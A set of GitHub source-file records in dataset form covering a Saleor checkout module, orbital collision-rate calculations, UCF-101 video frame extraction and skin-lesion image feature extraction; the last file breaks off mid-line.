iterative_bagging(parser.parse_args())","repo_name":"PkuDavidGuan/bagging_boosting","sub_path":"models/iterative_bagging.py","file_name":"iterative_bagging.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41014311950","text":"from dataclasses import dataclass\nfrom typing import TYPE_CHECKING, Iterable, List, Optional\n\nfrom django.utils.functional import SimpleLazyObject\n\nfrom ..discount import DiscountInfo, VoucherType\nfrom ..discount.utils import fetch_active_discounts\nfrom ..graphql.shipping.utils import (\n annotate_active_shipping_methods,\n annotate_shipping_methods_with_price,\n convert_shipping_method_model_to_dataclass,\n)\nfrom ..shipping.models import ShippingMethodChannelListing\n\nif TYPE_CHECKING:\n from ..account.models import Address, User\n from ..channel.models import Channel\n from ..discount.models import Voucher\n from ..plugins.manager import PluginsManager\n from ..product.models import (\n Collection,\n Product,\n ProductType,\n ProductVariant,\n ProductVariantChannelListing,\n )\n from ..shipping.models import ShippingMethod\n from .models import Checkout, CheckoutLine\n\n\n@dataclass\nclass CheckoutLineInfo:\n line: \"CheckoutLine\"\n variant: \"ProductVariant\"\n channel_listing: \"ProductVariantChannelListing\"\n product: \"Product\"\n product_type: \"ProductType\"\n collections: List[\"Collection\"]\n voucher: Optional[\"Voucher\"] = None\n\n\n@dataclass\nclass CheckoutInfo:\n checkout: \"Checkout\"\n user: Optional[\"User\"]\n channel: \"Channel\"\n billing_address: Optional[\"Address\"]\n shipping_address: Optional[\"Address\"]\n shipping_method: Optional[\"ShippingMethod\"]\n valid_shipping_methods: List[\"ShippingMethod\"]\n shipping_method_channel_listings: Optional[ShippingMethodChannelListing]\n\n def get_country(self) -> str:\n address = self.shipping_address or self.billing_address\n if address is None or not address.country:\n return self.checkout.country.code\n return address.country.code\n\n def get_customer_email(self) -> str:\n return self.user.email if self.user else self.checkout.email\n\n\ndef fetch_checkout_lines(checkout: \"Checkout\") -> Iterable[CheckoutLineInfo]:\n \"\"\"Fetch checkout lines as CheckoutLineInfo objects.\"\"\"\n\n from .utils import get_discounted_lines, get_voucher_for_checkout\n\n lines = checkout.lines.prefetch_related(\n \"variant__product__collections\",\n \"variant__channel_listings__channel\",\n \"variant__product__product_type\",\n )\n lines_info = []\n\n for line in lines:\n variant = line.variant\n product = variant.product\n product_type = product.product_type\n collections = list(product.collections.all())\n\n variant_channel_listing = None\n for channel_listing in line.variant.channel_listings.all():\n if channel_listing.channel_id == checkout.channel_id:\n variant_channel_listing = channel_listing\n\n # FIXME: Temporary solution to pass type checks. Figure out how to handle case\n # when variant channel listing is not defined for a checkout line.\n if not variant_channel_listing:\n continue\n\n lines_info.append(\n CheckoutLineInfo(\n line=line,\n variant=variant,\n channel_listing=variant_channel_listing,\n product=product,\n product_type=product_type,\n collections=collections,\n )\n )\n if checkout.voucher_code and lines_info:\n channel_slug = checkout.channel.slug\n voucher = get_voucher_for_checkout(\n checkout, channel_slug=channel_slug, with_prefetch=True\n )\n if not voucher:\n # in case when voucher is expired, it will be null so no need to apply any\n # discount from voucher\n return lines_info\n if voucher.type == VoucherType.SPECIFIC_PRODUCT or voucher.apply_once_per_order:\n discounted_lines_by_voucher: List[CheckoutLineInfo] = []\n if voucher.apply_once_per_order:\n discounts = fetch_active_discounts()\n channel = checkout.channel\n cheapest_line_price = None\n cheapest_line = None\n for line_info in lines_info:\n line_price = line_info.variant.get_price(\n product=line_info.product,\n collections=line_info.collections,\n channel=channel,\n channel_listing=line_info.channel_listing,\n discounts=discounts,\n )\n if not cheapest_line or cheapest_line_price > line_price:\n cheapest_line_price = line_price\n cheapest_line = line_info\n if cheapest_line:\n discounted_lines_by_voucher.append(cheapest_line)\n else:\n discounted_lines_by_voucher.extend(\n get_discounted_lines(lines_info, voucher)\n )\n for line_info in lines_info:\n if line_info in discounted_lines_by_voucher:\n line_info.voucher = voucher\n return lines_info\n\n\ndef fetch_checkout_info(\n checkout: \"Checkout\",\n lines: Iterable[CheckoutLineInfo],\n discounts: Iterable[\"DiscountInfo\"],\n manager: \"PluginsManager\",\n) -> CheckoutInfo:\n \"\"\"Fetch checkout as CheckoutInfo object.\"\"\"\n\n channel = checkout.channel\n shipping_address = checkout.shipping_address\n shipping_method = checkout.shipping_method\n shipping_method_channel_listing = None\n all_shipping_method_channel_listings = list(\n ShippingMethodChannelListing.objects.filter(\n channel=channel,\n )\n )\n if shipping_method:\n for listing in all_shipping_method_channel_listings:\n if listing.shipping_method_id == shipping_method.id:\n shipping_method_channel_listing = listing\n break\n\n checkout_info = CheckoutInfo(\n checkout=checkout,\n user=checkout.user,\n channel=channel,\n billing_address=checkout.billing_address,\n shipping_address=shipping_address,\n shipping_method=shipping_method,\n shipping_method_channel_listings=shipping_method_channel_listing,\n valid_shipping_methods=[],\n )\n checkout_info.valid_shipping_methods = SimpleLazyObject(\n lambda: get_valid_shipping_method_list_for_checkout_info(\n checkout_info,\n shipping_address,\n lines,\n discounts,\n manager,\n all_shipping_method_channel_listings,\n )\n ) # type: ignore\n return checkout_info\n\n\ndef update_checkout_info_shipping_address(\n checkout_info: CheckoutInfo,\n address: Optional[\"Address\"],\n lines: Iterable[CheckoutLineInfo],\n discounts: Iterable[\"DiscountInfo\"],\n manager: \"PluginsManager\",\n):\n checkout_info.shipping_address = address\n valid_methods = get_valid_shipping_method_list_for_checkout_info(\n checkout_info, address, lines, discounts, manager\n )\n checkout_info.valid_shipping_methods = valid_methods\n\n\ndef get_valid_shipping_method_list_for_checkout_info(\n checkout_info: \"CheckoutInfo\",\n shipping_address: Optional[\"Address\"],\n lines: Iterable[CheckoutLineInfo],\n discounts: Iterable[\"DiscountInfo\"],\n manager: \"PluginsManager\",\n channel_listings: Optional[List[\"ShippingMethodChannelListing\"]] = None,\n):\n from .utils import get_valid_shipping_methods_for_checkout\n\n if channel_listings is None:\n channel_listings = list(\n ShippingMethodChannelListing.objects.filter(channel=checkout_info.channel)\n )\n\n country_code = shipping_address.country.code if shipping_address else None\n subtotal = manager.calculate_checkout_subtotal(\n checkout_info, lines, checkout_info.shipping_address, discounts\n )\n subtotal -= checkout_info.checkout.discount\n checkout = checkout_info.checkout\n\n valid_shipping_methods = (\n get_valid_shipping_methods_for_checkout(\n checkout_info, lines, subtotal, country_code=country_code\n )\n or []\n )\n annotate_shipping_methods_with_price(\n valid_shipping_methods,\n channel_listings,\n checkout_info.shipping_address,\n checkout_info.channel.slug,\n manager,\n )\n shipping_method_dataclasses = [\n convert_shipping_method_model_to_dataclass(shipping)\n for shipping in valid_shipping_methods\n ]\n excluded_shipping_methods = manager.excluded_shipping_methods_for_checkout(\n checkout, shipping_method_dataclasses\n )\n annotate_active_shipping_methods(\n valid_shipping_methods,\n excluded_shipping_methods,\n )\n\n return [method for method in valid_shipping_methods if method.active]\n\n\ndef update_checkout_info_shipping_method(\n checkout_info: CheckoutInfo, shipping_method: Optional[\"ShippingMethod\"]\n):\n checkout_info.shipping_method = shipping_method\n checkout_info.shipping_method_channel_listings = (\n (\n ShippingMethodChannelListing.objects.filter(\n shipping_method=shipping_method, channel=checkout_info.channel\n ).first()\n )\n if shipping_method\n else None\n )\n","repo_name":"TGalioAutomation/web-saleor","sub_path":"saleor/checkout/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":9175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35485848243","text":"from Functions import *\n'''\nau = 149597871e3\nG = 6.67408e-11\nMstar = 1.2e30\n'''\n\n#(a1,e1)=orbitalvalues(3)\n#(a2,e2)=orbitalvalues(10)\n#a1=0.999*a1\n\n#Values\n'''\na1 = 2.5 * au\ne1 = 0.998\na2 = 2.4 * au\ne2 = 0.997\n'''\n\n#I=1* ((2 * pi) / 360)\n#Rbeam=100e3\n\ndef TPrecess(a,e):\n Tp=0.15*((1-(e**2.))/(1-(0.999**2.)))*((a/au)**2.5)*(10**6.) #in Yrs\n wp = (2 * np.pi) / Tp\n return (Tp,wp)\n\n\n\n\ndef RcolwoATcontact(a1,e1,a2,e2,s1,s2,x,I1,I2,Rbeam):\n (Tp1, wp1) = TPrecess(a1, e1)\n (Tp2, wp2) = TPrecess(a2, e2)\n CollisionData=CollisionPoints(a1,e1,s1,a2,e2,s2)\n if x == 'a':\n R = CollisionData[1, 0]\n C = CollisionData[0, 0]\n elif x == 'b':\n R = CollisionData[1, 1]\n C = CollisionData[0, 1]\n\n if R==0:\n RColwoA=0\n Tcontact=0\n #print('no contact')\n\n else:\n td1=thetadot(a1,e1,C-s1)\n rd1=rdot(a1,e1,C-s1)\n V1=np.array([rd1,R*td1*cos(I1),R*td1*sin(I1)])\n v1=np.sqrt((rd1**2.)+((R*td1)**2.))\n td2 = thetadot(a2, e2, C - s2)\n rd2 = rdot(a2, e2, C - s2)\n V2 = np.array([rd2, R * td2 * cos(I2), R * td2 * sin(I2)])\n v2 = np.sqrt((rd2 ** 2.) + ((R * td2) ** 2.))\n Vrelpar=V1-V2\n vrelpar=npal.norm(Vrelpar)\n gammangle=np.arccos(np.vdot(V1,V2)/(v1*v2))\n\n\n T1 = 2 * pi * np.sqrt((a1 ** 3.) / (G * Mstar)) # Orbital Period\n T2 = 2 * pi * np.sqrt((a2 ** 3.) / (G * Mstar))\n\n sinval=abs(sin(gammangle))\n '''\n if (16*abs((rd1/td1)-(rd2/td2)))/(3*pi*R)>sinval:\n sinval=(16*abs((rd1/td1)-(rd2/td2)))/(3*pi*R)\n print('sinval',sinval)\n print('lambda=',(s1-s2)%(2*pi))\n '''\n\n\n\n RColwoA=(16 / (3 * pi)) * (1 / (T1 * T2)) * ((vrelpar )/ (sinval*v1 * v2 ))*(year/Rbeam) #\n\n Tcontact=abs((4*Rbeam*np.linalg.norm(np.cross(V1, V2)))/(((R** 2.) * td1 * td2 * abs(sin(I2-I1)))*(((wp1) * (rd1 / td1)) - (wp2) * (rd2 / td2))))\n\n\n return [RColwoA,Tcontact]\n\n\n\ndef RcolwoATcontactSecondOrder(a1,e1,a2,e2,s1,s2,x,I1,I2,Rbeam):\n (Tp1, wp1) = TPrecess(a1, e1)\n (Tp2, wp2) = TPrecess(a2, e2)\n CollisionData=CollisionPoints(a1,e1,s1,a2,e2,s2)\n if x == 'a':\n R = CollisionData[1, 0]\n C = CollisionData[0, 0]\n elif x == 'b':\n R = CollisionData[1, 1]\n C = CollisionData[0, 1]\n else:\n print('Error, no point selected')\n R=0\n if R==0:\n #print('no contact error')\n RColwoA=0\n Tcontact=0\n else:\n td1=thetadot(a1,e1,C-s1)\n rd1=rdot(a1,e1,C-s1)\n V1=np.array([rd1,R*td1*cos(I1),R*td1*sin(I1)])\n v1=np.sqrt((rd1**2.)+((R*td1)**2.))\n td2 = thetadot(a2, e2, C - s2)\n rd2 = rdot(a2, e2, C - s2)\n V2 = np.array([rd2, R * td2 * cos(I2), R * td2 * sin(I2)])\n v2 = np.sqrt((rd2 ** 2.) + ((R * td2) ** 2.))\n Vrelpar=V1-V2\n vrelpar=npal.norm(Vrelpar)\n gammangle=np.arccos(np.vdot(V1,V2)/(v1*v2))\n\n\n T1 = 2 * pi * np.sqrt((a1 ** 3.) / (G * Mstar)) # Orbital Period\n T2 = 2 * pi * np.sqrt((a2 ** 3.) / (G * Mstar))\n\n sinval=abs(sin(gammangle))\n '''\n if (16*abs((rd1/td1)-(rd2/td2)))/(3*pi*R)>sinval:\n sinval=(16*abs((rd1/td1)-(rd2/td2)))/(3*pi*R)\n print('sinval',sinval)\n print('lambda=',(s1-s2)%(2*pi))\n '''\n\n\n\n RColwoA=(16 / (3 * pi)) * (1 / (T1 * T2)) * ((vrelpar )/ (sinval*v1 * v2 ))*(year/Rbeam) #\n\n\n\n dr=((2*Rbeam)*np.linalg.norm(np.cross(V1, V2)))/((R** 2.) * td1 * td2 * abs(sin(I2-I1)))\n Alpha=(wp1 * (rd1 / td1)) - (wp2 * (rd2 / td2))\n Beta=abs(((((wp1 * (rd1 / td1))**2.) - ((wp2 * (rd2 / td2))**2.))/R)+((R/2)*((wp1**2.)-(wp2**2.)))-(((R**2.)/2)*((((wp1**2.)/(a1*(1-(e1**2.))))-((wp2**2.)/(a2*(1-(e2**2.))))))))\n Tcontact = (np.sqrt((Alpha ** 2.) + (4 * Beta * dr)) - np.sqrt((Alpha ** 2.) - (4 * Beta * dr))) / (2*Beta)\n\n\n return [RColwoA,Tcontact]\n\n\ndef TcontactSearchMethod(a1,e1,a2,e2,s1i,s2i,x,I1,I2,Rbeam):\n\n CollisionData=CollisionPoints(a1,e1,s1i,a2,e2,s2i)\n if x == 'a':\n R = CollisionData[1, 0]\n C = CollisionData[0, 0]\n elif x == 'b':\n R = CollisionData[1, 1]\n C = CollisionData[0, 1]\n else:\n print('Error, no point selected')\n R=0\n if R==0:\n #print('no contact error')\n RColwoA=0\n Tcontact=0\n dr=0\n\n else:\n td1=thetadot(a1,e1,C-s1i)\n rd1=rdot(a1,e1,C-s1i)\n V1=np.array([rd1,R*td1*cos(I1),R*td1*sin(I1)])\n td2 = thetadot(a2, e2, C - s2i)\n rd2 = rdot(a2, e2, C - s2i)\n V2 = np.array([rd2, R * td2 * cos(I2), R * td2 * sin(I2)])\n dr = ((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1)))\n tinterval=0.5\n\n (Tp1, wp1) = TPrecess(a1, e1)\n (Tp2, wp2) = TPrecess(a2, e2)\n # up loop\n dr = [((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1))),0]\n dRplus=[0,0]\n y=0\n tplus=0\n while abs(dRplus[y])abs(abs(dRplus[(y+1)%2])-dr[(y+1)%2]): #if the previous was closer, go back\n tplus-=tinterval\n\n dRminus = [0, 0]\n dr = [((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1))), 0]\n y = 0\n tminus = 0\n while abs(dRminus[y]) < dr[y]:\n tminus -= tinterval\n y = (y + 1) % 2\n dRminus[y] = npr(a1, e1, C - s1i - (wp1 * tminus)) - npr(a2, e2, C - s2i - (\n wp2 * tminus))\n td1 = thetadot(a1, e1, C - s1i - (wp1 * tminus))\n rd1 = rdot(a1, e1, C - s1i - (wp1 * tminus))\n V1 = np.array([rd1, R * td1 * cos(I1), R * td1 * sin(I1)])\n td2 = thetadot(a2, e2, C - s2i - (\n wp2 * tminus))\n rd2 = rdot(a2, e2, C - s2i - (\n wp2 * tminus))\n V2 = np.array([rd2, R * td2 * cos(I2), R * td2 * sin(I2)])\n\n dr[y] = ((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1)))\n if abs(abs(dRminus[y]) - dr[y]) > abs(\n abs(dRminus[(y + 1) % 2]) - dr[(y + 1) % 2]): # if the previous was closer, go back\n tminus += tinterval\n '''\n dRminus = 0\n tminus = 0\n dr = ((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1)))\n while abs(dRminus) < dr:\n tminus -= tinterval\n dRminus = npr(a1, e1, C- s1i - (wp1 * tminus)) - npr(a2, e2, C - s2i - (\n wp2 * tminus)) # changed from plue to minus!\n td1 = thetadot(a1, e1, C - s1i - (wp1 * tplus))\n rd1 = rdot(a1, e1, C - s1i - (wp1 * tplus))\n V1 = np.array([rd1, R * td1 * cos(I1), R * td1 * sin(I1)])\n td2 = thetadot(a2, e2, C - s2i - (\n wp2 * tplus))\n rd2 = rdot(a2, e2, C - s2i - (\n wp2 * tplus))\n V2 = np.array([rd2, R * td2 * cos(I2), R * td2 * sin(I2)])\n\n dr = ((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1)))\n '''\n\n\n #print(tplus)\n #print(tminus)\n Tcontact=abs(tplus-tminus)\n dr = ((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1)))\n\n\n return [Tcontact,dr]\n\n\ndef TorGraph():\n N=int(1000)\n s1=0\n s2=np.linspace(0,2*pi,N)\n Data=np.zeros((3,N))#Rcol,Tcont,tor\n for i in range(1,N):\n [Data[0,i],Data[1,i]]=RcolwoATcontact(0,s2[i],'b')\n Data[2,i]=Data[0,i]*Data[1,i]*1e17\n\n plt.figure()\n plt.semilogy(s2[1:N-1],Data[0,1:N-1],label='Rcol')\n plt.xlabel('Lambda')\n plt.ylabel('Rcol')\n\n plt.figure()\n plt.semilogy(s2[1:N-1], Data[1, 1:N-1], label='Tcontact')\n plt.xlabel('Lambda')\n plt.ylabel('Tcontact, yrs')\n\n plt.figure()\n plt.semilogy(s2[1:N-1], Data[2, 1:N-1], label='Tor x 10^17')\n plt.xlabel('Lambda')\n plt.ylabel('Tor')\n return\n\ndef lambdatimeaverage(N):\n N=int(N)\n #N = int(1000)\n s1 = 0\n s2 = np.linspace(0, 2 * pi, N)\n Data = np.zeros((3, N)) # Rcol,Tcont,tor\n LambAv=0\n for i in range(1, N):\n [Data[0, i], Data[1, i]] = RcolwoATcontact(0, s2[i], 'b')\n Data[2, i] = Data[0, i] * Data[1, i]\n LambAv +=Data[2, i]\n [Data[0, i], Data[1, i]] = RcolwoATcontact(0, s2[i], 'a')\n Data[2, i] = Data[0, i] * Data[1, i]\n LambAv+=Data[2,i]\n\n Tpmin=min(Tp1,Tp2)\n LambAv = (LambAv / (2 * N))*(4/Tpmin)\n print(LambAv)\n\n return LambAv\n\ndef TcontactGraphs(N,rs1,rs2,pmod):\n N=int(N)\n Rbeam=100*1e3\n I1=0\n I2=10*(pi/180)\n\n (a1, e1) = orbitalvalues(rs1)\n (a2, e2) = orbitalvaluesmod(rs2, pmod)\n\n\n\n (Tp1, wp1) = TPrecess(a1, e1)\n (Tp2, wp2) = TPrecess(a2, e2)\n\n L = np.linspace(0, 2 * pi, N) # NOTE CHECK L def!! + or - #s1-s2\n R = np.zeros((2, N)) # radial collision points\n C = np.zeros((2, N)) # theta collision point\n AB = ['a', 'b']\n # s\n\n for i in range(1, N):\n [[C[0, i], C[1, i]], [R[0, i], R[1, i]]] = CollisionPoints(a1, e1, 0, a2, e2, L[i])\n\n Rdot1 = rdot(a1, e1, C[:, :])\n Thetadot1 = thetadot(a1, e1, C[:, :])\n Rdot2 = rdot(a2, e2, C[:, :] - L)\n Thetadot2 = thetadot(a2, e2, C[:, :] - L)\n Vinc1 = np.zeros((2, 3, N))\n Vinc2 = np.zeros((2, 3, N))\n vrelpar = np.zeros((2, N))\n\n\n\n Tcontact= np.zeros((2, N))\n TcontactSecond = np.zeros((2, N))\n TcontSearch= np.zeros((2, N))\n Rcol= np.zeros((2, N))\n ProblemValue=np.zeros((2, N))\n dr=np.zeros((2, N))\n print('Calculating times...')\n for i in range(1, N - 1):\n #print(i,'/',N-2)\n for x in (0, 1):\n #MinTpr[x,i] = TPrAnalytic(OrbitdataVdata[x, 0, i], OrbitdataVdata[x, 1, i]) #Min\n\n #MaxTpr[x,i] = MinTpr[x,i] * dflr[x, i]*rfrag #Max\n [Rcol[x,i],Tcontact[x,i]]=RcolwoATcontact(a1,e1,a2,e2,0,L[i],AB[x],I1,I2,Rbeam)\n\n\n TcontactSecond[x, i] = RcolwoATcontactSecondOrder(a1, e1, a2, e2, 0, L[i], AB[x], I1, I2, Rbeam)[1]\n ProblemValue[x,i]=((Rdot1[x,i]/Thetadot1[x,i])*wp1)-((Rdot2[x,i]/Thetadot2[x,i])*wp2)\n [TcontSearch[x,i],dr[x,i]]=TcontactSearchMethod(a1, e1, a2, e2, 0, L[i], AB[x], I1, I2, Rbeam)\n\n print('plotting')\n for x in (0, 1):\n plt.figure()\n plt.title('Times at %s pts, rsource1=%s au, rsource2=%s au with pmod=%s' % (AB[x], rs1, rs2, pmod))\n plt.semilogy(L[1:N - 1] / pi, Tcontact[x, 1:N - 1], label='Contact time')\n plt.semilogy(L[1:N - 1] / pi, TcontactSecond[x, 1:N - 1], label='Second Order Contact time')\n plt.semilogy(L[1:N - 1] / pi, TcontSearch[x, 1:N - 1], label='Searched Tcont')\n plt.ylabel('Times, yrs')\n plt.xlabel('Lambda')\n plt.legend()\n '''\n plt.figure()\n plt.title('dr at %s pts, rsource1=%s au, rsource2=%s au with pmod=%s' % (AB[x], rs1, rs2, pmod))\n plt.semilogy(L[1:N - 1] / pi, dr[x, 1:N - 1], label='dr')\n plt.ylabel('dr, distance')\n plt.xlabel('Lambda')\n plt.legend()\n\n plt.figure()\n plt.title('ProbValue at %s pts, rsource1=%s au, rsource2=%s au with pmod=%s' % (AB[x], rs1, rs2, pmod))\n plt.semilogy(L[1:N - 1] / pi, abs(ProblemValue[x, 1:N - 1]), label='Prob Value')\n '''\n\n return\n\n\n\n\n#COMMANDS\n#[RColwoA,Tcontact]=RcolwoATcontact(0,3,'a')\n#print([RColwoA,Tcontact])\n#TorGraph()\n#lambdatimeaverage(1e4)\n\nTcontactGraphs(1e3,10,3,0.9)\nplt.show(), print('plotted')\n\n#3,10,0.9","repo_name":"TomMCallingham/SpaggetiAstro","sub_path":"Summer/Evolution/RcolTContact.py","file_name":"RcolTContact.py","file_ext":"py","file_size_in_byte":12249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41389419084","text":"import cv2 # for capturing videos\nimport numpy as np # efficient array operations\nimport pandas as pd\nimport gzip # efficient compression of numpy arrays \nfrom tqdm import tqdm\nimport os\n\ndef SaveVideoFrames(video_path, frames_array, f=10, max_frames=10, resize=(224, 224)):\n \"\"\"\n Extract frames from video file with certain frequency.\n\n Parameters\n ----------\n video_path : str\n Path of the video file to be extracted.\n frame_array_path : str\n Path to store the NumPy array of frames of the video file to.\n f : int\n Intervals at which the frames are to be extracted (default=10).\n max_frames : int\n The maximum no. of frames to be extracted.\n resize : tuple of pair of int\n The size to which frames should be resized\n \"\"\"\n\n count = 0\n frames = []\n zero_frame = np.zeros(shape=(resize[0], resize[1], 3))\n try:\n vidObj = cv2.VideoCapture(video_path)\n while len(frames) < max_frames:\n success, frame = vidObj.read()\n if success == False:\n while len(frames) < max_frames:\n frames.append(zero_frame)\n break\n count += 1\n if count%f > 0:\n continue\n frame = cv2.resize(frame, resize)\n frame = frame[:, :, [2, 1, 0]]\n frames.append(frame)\n vidObj.release()\n f = gzip.GzipFile(frames_array + \".npy.gz\", \"w\")\n np.save(f, np.array(frames))\n f.close()\n except:\n print(\"Extraction of \" + video_path + \" failed.\")\n\nvideos_path = \"./UCF-101\"\nannotations_path = \"./ucfTrainTestlist\"\n\nframes_path = \"./preprocessed\"\nos.makedirs(frames_path, exist_ok=True)\nprint(\"\\nFrames of video file will be extracted to: \" + frames_path)\n\nwith open(os.path.join(annotations_path, \"trainlist01.txt\")) as f:\n lines = f.readlines()\n train_df = [l.strip('\\n').split(maxsplit=1) for l in lines]\ntrain_df = pd.DataFrame(train_df, columns=[\"path\", \"label\"])\n\nprint(\"\\nExtracting frames from video files in train set...\\n\")\nfor idx in tqdm(range(len(train_df))):\n video = os.path.join(videos_path, train_df.iloc[idx][\"path\"])\n frames_array = os.path.join(frames_path, video.split('/')[-1].split('.avi')[0])\n SaveVideoFrames(video, frames_array, f=5, max_frames=10, resize=(224, 224))\nprint(\"\\nFrame extraction of train set complete!\")\n\ntrain_df['path'] = train_df['path'].apply(lambda x: os.path.join(frames_path, x.split('/')[-1].split('.avi')[0]+'.npy.gz'))\ntrain_df_path = \"./train.csv\"\ntrain_df.to_csv(train_df_path, index=False)\nprint(\"\\nTraining DataFrame saved as: \" + train_df_path)","repo_name":"mvedang/COMS-E6998-Project-Fall-2021","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10276193048","text":"# -*- coding: utf-8 -*-\n\"\"\"\nISM Project Part 1: features.py\n\nCreated on Mon Dez 3 10:49:12 2018\n\n@author: Sabljak\n\"\"\"\nimport numpy as np\nimport cv2\nimport os\nimport pandas as pd\nfrom PIL import Image, ImageOps\nfrom skimage import feature, img_as_ubyte, color\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.preprocessing import MinMaxScaler, scale\nfrom sklearn.svm import LinearSVC\nfrom sklearn.feature_selection import SelectFromModel\n\n\nclass Features:\n\n \"\"\"Feature Extraction, Selection and Preparation\"\"\"\n def __init__(self, im_path, data_path, dev_set_path, feature_path=None, test_set=False):\n self.im_path = im_path\n self.data_path = data_path\n self.feature_path = feature_path\n self.dev_set_path = dev_set_path\n self.test_set = test_set\n self.img = []\n self.im2 = []\n self.data = []\n self.class_names = ['mel', 'nv', 'bcc', 'akiec', 'bkl', 'df', 'vasc']\n self.classes = []\n self.train_classes = []\n self.dev_classes = []\n self.feature_names = []\n self.features = []\n self.train_features = []\n self.dev_features = []\n self.test_data = []\n self.test_features = []\n\n def load_data(self):\n # Feature Extraction of Test Data\n if self.test_set is True and self.feature_path is None:\n # get names of test images\n data = sorted([os.path.splitext(f)[0] for f in os.listdir(self.im_path) if not f.startswith('.')])\n self.data = pd.DataFrame(data, columns=['image_id'])\n # open images, equalize histogram, then save to list of numpy arrays\n for i in range(0, self.data.shape[0]):\n im = Image.open(self.im_path + self.data.image_id[i] + '.jpg')\n im.load()\n # im_hist = ImageOps.equalize(im)\n # append to list\n # TODO: rechange\n self.img.append(np.asarray(im))\n\n self.features = pd.DataFrame(index=range(self.data.__len__()))\n\n # Feature Extraction of Training Data\n else:\n self.data = pd.read_csv(self.data_path)\n self.classes = self.data.dx\n\n if self.feature_path is None:\n # open images, equalize histogram, then save to list of numpy arrays\n for i in range(0, self.data.shape[0]):\n im = Image.open(self.im_path + self.data.image_id[i] + '.jpg')\n im.load()\n im_hist = ImageOps.equalize(im)\n # append to list\n self.img.append(np.asarray(im_hist))\n\n self.features = self.data.drop(['lesion_id', 'image_id', 'dx', 'dx_type', 'age', 'sex', 'localization'],\n axis=1)\n\n else:\n self.features = pd.read_csv(self.feature_path)\n self.test_data = pd.DataFrame(sorted([os.path.splitext(f)[0] for f in os.listdir(self.im_path)\n if not f.startswith('.')]), columns=['image_id'])\n self.test_features = pd.read_csv(self.test_set)\n\n \"\"\"Legendre Moments\"\"\"\n def lp(self, n, x):\n if n == 0:\n return 1\n elif n == 1:\n return x\n else:\n return ((2*n-1)*x*self.lp(n-1, x) - (n-1)*self.lp(n-2, x)) / n\n\n def beta(self, img, m, n):\n return (2 * m + 1) * (2 * n + 1) / (img.shape[0] * img.shape[1])\n\n def xcoord(self, img, i):\n return ((2*i)/(img.shape[1]-1)) - 1\n\n def ycoord(self, img, j):\n return ((2*j)/(img.shape[0]-1)) - 1\n\n def legendre_moment(self, img, m, n):\n s = 0\n for y in range(img.shape[0]):\n for x in range(img.shape[1]):\n s += self.lp(n, self.ycoord(img, y)) * self.lp(m, self.xcoord(img, x)) * img[y, x]\n return self.beta(img, m, n) * s\n\n # moments for each colour channel\n def legendre_moments(self):\n # initialise feature vector\n for colour in \"RGB\":\n for p in range(3):\n for q in range(3):\n self.features['Moment_{0}_L{1}{2}'.format(colour, p, q)] = 'default'\n for i in range(0, self.data.shape[0]):\n im_id = self.data['image_id'][i]\n for p in range(3):\n for q in range(3):\n m = self.legendre_moment(self.img[i], p, q)\n self.features.loc[self.data['image_id'] == im_id, ['Moment_R_L{0}{1}'.format(p, q)]] = m[0]\n self.features.loc[self.data['image_id'] == im_id, ['Moment_G_L{0}{1}'.format(p, q)]] = m[1]\n self.features.loc[self.data['image_id'] == im_id, ['Moment_B_L{0}{1}'.format(p, q)]] = m[2]\n print(m)\n self.features.to_csv('features.csv', index=False)\n\n # moments of black-white images\n def legendre_moments_bw(self):\n for p in range(3):\n for q in range(3):\n self.features['Moment_L{0}{1}'.format(p, q)] = 'default'\n for i in range(0, self.data.shape[0]):\n im_id = self.data['image_id'][i]\n for p in range(3):\n for q in range(3):\n self.features.loc[self.data['image_id'] == im_id, ['Moment_L{0}{1}'.format(p, q)]] = \\\n self.legendre_moment(color.rgb2grey(self.img[i]), p, q)\n # self.features.to_csv('features.csv', index=False)\n\n \"\"\"textures\"\"\"\n def textures(self):\n self.features['contrast'] = 'default'\n self.features['dissimilarity'] = 'default'\n self.features['homogeneity'] = 'default'\n self.features['energy'] = 'default'\n self.features['correlation'] = 'default'\n\n for i in range(0, self.data.shape[0]):\n im_id = self.data['image_id'][i]\n\n grey_co_mat = feature.greycomatrix(img_as_ubyte(color.rgb2grey(self.img[i])), [2], [0], 256, symmetric=True,\n normed=True)\n\n self.features.loc[self.data['image_id'] == im_id, ['contrast']] = \\\n feature.greycoprops(grey_co_mat, prop='contrast')\n self.features.loc[self.data['image_id'] == im_id, ['dissimilarity']] = \\\n feature.greycoprops(grey_co_mat, prop='dissimilarity')\n self.features.loc[self.data['image_id'] == im_id, ['homogeneity']] = \\\n feature.greycoprops(grey_co_mat, prop='homogeneity')\n self.features.loc[self.data['image_id'] == im_id, ['energy']] = \\\n feature.greycoprops(grey_co_mat, prop='energy')\n self.features.loc[self.data['image_id'] == im_id, ['correlation']] = \\\n feature.greycoprops(grey_co_mat, prop='correlation')\n self.features.to_csv('features.csv', index=False)\n\n \"\"\"average colour\"\"\"\n def avr_colour(self):\n self.features['average_red'] = 'default'\n self.features['average_green'] = 'default'\n self.features['average_blue'] = 'default'\n\n for i in range(0, self.data.shape[0]):\n im_id = self.data['image_id'][i]\n\n # add average color information to dataframe\n average = 